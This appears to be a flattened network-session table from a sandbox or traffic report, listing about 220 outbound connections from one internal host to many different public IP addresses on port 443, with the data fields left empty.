                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17697192.168.2.235454272.163.172.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17698192.168.2.235765240.196.87.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17699192.168.2.2345554119.45.106.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17700192.168.2.2355942155.53.217.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17701192.168.2.2355610148.228.56.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17702192.168.2.233811836.189.229.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17703192.168.2.233731698.240.179.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17704192.168.2.2334972189.218.77.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17705192.168.2.233857652.217.247.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17706192.168.2.233398496.55.231.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17707192.168.2.2343330201.74.29.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17708192.168.2.2350108139.210.12.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17709192.168.2.234376648.132.33.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17710192.168.2.2359094210.85.76.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17711192.168.2.2340062209.20.32.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17712192.168.2.2352742195.110.251.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17713192.168.2.233939088.80.14.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17714192.168.2.2347072151.0.236.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17715192.168.2.235307639.162.170.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17716192.168.2.234880868.175.52.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17717192.168.2.233967482.89.24.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17718192.168.2.234667879.56.12.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17719192.168.2.234904477.192.186.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17720192.168.2.2332792198.190.224.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17721192.168.2.234167453.67.3.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17722192.168.2.2351574183.5.54.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17723192.168.2.23328742.170.62.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17724192.168.2.23412285.45.254.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17725192.168.2.2343146191.234.193.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17726192.168.2.234174241.82.209.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17727192.168.2.2340212117.112.55.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17728192.168.2.234920664.178.32.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17729192.168.2.2338252123.255.31.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17730192.168.2.2339284210.13.129.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17731192.168.2.2348976195.152.89.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17732192.168.2.2358028125.112.113.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17733192.168.2.235275468.163.131.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17734192.168.2.2334226105.136.120.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17735192.168.2.2335460100.230.207.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17736192.168.2.2345856112.42.0.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17737192.168.2.2351630190.107.124.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17738192.168.2.234969499.74.52.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17739192.168.2.2353864182.102.197.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17740192.168.2.234072084.50.250.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17741192.168.2.2355622163.111.169.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17742192.168.2.2342940124.30.17.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17743192.168.2.235887293.208.233.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17744192.168.2.234560869.121.28.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17745192.168.2.2352938141.221.59.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17746192.168.2.235050257.234.102.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17747192.168.2.2357688180.249.36.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17748192.168.2.2352752206.174.152.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17749192.168.2.2349648118.251.55.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17750192.168.2.233622835.241.175.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17751192.168.2.2357022223.169.49.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17752192.168.2.234035664.238.118.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17753192.168.2.2332826181.189.173.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17754192.168.2.2360922175.209.77.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17755192.168.2.2347720205.67.116.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17756192.168.2.234018486.19.235.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17757192.168.2.235829484.40.48.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17758192.168.2.235705053.118.180.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17759192.168.2.234197439.236.228.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17760192.168.2.235617417.184.181.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17761192.168.2.233660639.148.9.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17762192.168.2.235646437.81.110.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17763192.168.2.2356470133.254.164.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17764192.168.2.234787837.202.202.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17765192.168.2.2338994216.85.212.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17766192.168.2.235272037.111.9.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17767192.168.2.2358892103.92.180.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17768192.168.2.2339116112.98.96.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17769192.168.2.2345232192.141.61.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17770192.168.2.2351642159.166.190.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17771192.168.2.235487888.155.83.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17772192.168.2.2334788188.164.92.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17773192.168.2.2337252104.237.181.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17774192.168.2.2343508161.243.95.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17775192.168.2.2335300193.157.153.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17776192.168.2.2353604143.195.157.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17777192.168.2.233510839.76.85.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17778192.168.2.2349472106.219.21.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17779192.168.2.2347288118.247.62.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17780192.168.2.234492663.174.176.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17781192.168.2.235373812.50.76.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17782192.168.2.2349224193.248.146.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17783192.168.2.2341478118.36.160.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17784192.168.2.233732077.135.24.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17785192.168.2.2359638152.154.51.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17786192.168.2.234731841.251.87.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17787192.168.2.234271249.64.220.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17788192.168.2.234097271.32.152.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17789192.168.2.2343888209.47.47.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17790192.168.2.2336956115.235.73.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17791192.168.2.234598289.90.130.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17792192.168.2.2339250154.28.249.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17793192.168.2.234831895.14.16.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17794192.168.2.2334024165.179.53.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17795192.168.2.2351018153.138.79.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17796192.168.2.2355718190.4.28.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17797192.168.2.23395002.143.218.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17798192.168.2.233991299.187.80.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17799192.168.2.233762634.222.49.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17800192.168.2.235684819.253.116.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17801192.168.2.235591218.235.31.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17802192.168.2.2353202104.145.137.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17803192.168.2.2335504119.75.110.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17804192.168.2.2341416157.142.220.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17805192.168.2.235933242.117.65.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17806192.168.2.235148490.27.159.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17807192.168.2.2358586106.191.31.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17808192.168.2.2338796146.127.248.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17809192.168.2.2340060164.191.86.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17810192.168.2.235883427.218.55.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17811192.168.2.234800848.143.202.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17812192.168.2.2335736180.244.116.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17813192.168.2.2337054219.12.34.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17814192.168.2.234543245.57.32.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17815192.168.2.2358498197.194.11.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17816192.168.2.233742483.91.97.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17817192.168.2.235996848.111.205.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17818192.168.2.235835064.251.69.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17819192.168.2.2346300162.4.75.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17820192.168.2.2340826120.217.211.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17821192.168.2.235895891.198.34.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17822192.168.2.233600673.36.245.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17823192.168.2.2352796118.20.69.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17824192.168.2.2353224133.152.156.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17825192.168.2.234126673.93.230.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17826192.168.2.2335774191.183.81.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17827192.168.2.2346886210.32.0.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17828192.168.2.2355982191.137.26.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17829192.168.2.2338264108.25.192.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17830192.168.2.234752035.161.56.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17831192.168.2.2355052170.169.72.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17832192.168.2.2338572212.13.217.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17833192.168.2.2343776196.248.23.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17834192.168.2.235323263.77.0.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17835192.168.2.234136869.243.204.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17836192.168.2.2347496107.200.168.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17837192.168.2.2338940220.98.150.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17838192.168.2.2339976217.250.204.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17839192.168.2.235354618.145.193.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17840192.168.2.233277486.39.97.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17841192.168.2.2335238141.206.139.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17842192.168.2.235607060.209.156.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17843192.168.2.2344590197.69.204.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17844192.168.2.235152286.120.168.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17845192.168.2.2350138123.48.212.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17846192.168.2.234273874.229.240.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17847192.168.2.2351720109.76.85.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17848192.168.2.236044647.79.128.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17849192.168.2.235585892.179.210.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17850192.168.2.235168884.217.74.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17851192.168.2.234308051.191.241.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17852192.168.2.2345122149.105.159.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17853192.168.2.2337710192.136.113.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17854192.168.2.2348830181.113.189.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17855192.168.2.2335532106.238.157.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17856192.168.2.2352980144.165.73.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17857192.168.2.235634635.163.199.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17858192.168.2.233993087.240.91.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17859192.168.2.235496661.155.99.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17860192.168.2.2359780202.192.140.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17861192.168.2.2345850217.129.102.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17862192.168.2.2353838170.117.50.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17863192.168.2.23543785.124.240.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17864192.168.2.2353020184.100.170.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17865192.168.2.234555840.251.237.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17866192.168.2.2344426220.97.141.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17867192.168.2.233375837.179.12.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17868192.168.2.2347812138.56.39.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17869192.168.2.2339712157.44.176.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17870192.168.2.2351162204.178.86.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17871192.168.2.2338594124.233.80.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17872192.168.2.2336972203.84.99.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17873192.168.2.233661270.130.44.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17874192.168.2.235516820.31.145.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17875192.168.2.234627679.184.180.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17876192.168.2.235786463.123.66.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17877192.168.2.235123287.147.216.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17878192.168.2.2347588123.197.117.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17879192.168.2.2348230211.168.65.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17880192.168.2.2343890172.248.39.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17881192.168.2.233415245.201.169.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17882192.168.2.2353368135.102.137.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17883192.168.2.2354848136.184.215.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17884192.168.2.234656691.17.164.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17885192.168.2.235173444.86.106.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17886192.168.2.234223224.68.137.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17887192.168.2.235521834.101.247.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17888192.168.2.2358602223.145.74.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17889192.168.2.2335344204.125.182.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17890192.168.2.233712243.79.236.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17891192.168.2.2359286209.138.251.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17892192.168.2.234318823.235.199.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17893192.168.2.2341006200.153.205.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17894192.168.2.2355798222.12.242.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17895192.168.2.234087659.199.154.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17896192.168.2.235175666.25.146.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17897192.168.2.235253288.125.176.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17898192.168.2.2340276105.94.191.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17899192.168.2.236099658.194.169.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17900192.168.2.234354891.157.34.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17901192.168.2.233498890.164.248.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17902192.168.2.2356332101.215.221.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17903192.168.2.233313663.16.133.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17904192.168.2.2356066175.22.176.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17905192.168.2.2341620198.223.79.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17906192.168.2.235223213.87.137.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17907192.168.2.233460049.130.29.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17908192.168.2.235579632.218.105.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17909192.168.2.233359047.226.50.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17910192.168.2.2340690111.153.63.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17911192.168.2.234038034.37.179.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17912192.168.2.2350138210.170.186.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17913192.168.2.2335430192.181.106.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17914192.168.2.2345228101.237.186.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17915192.168.2.2358508111.90.86.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17916192.168.2.2342056207.56.64.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17917192.168.2.2360682148.131.7.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17918192.168.2.2358088220.39.238.221443
                                                TimestampBytes transferredDirectionData


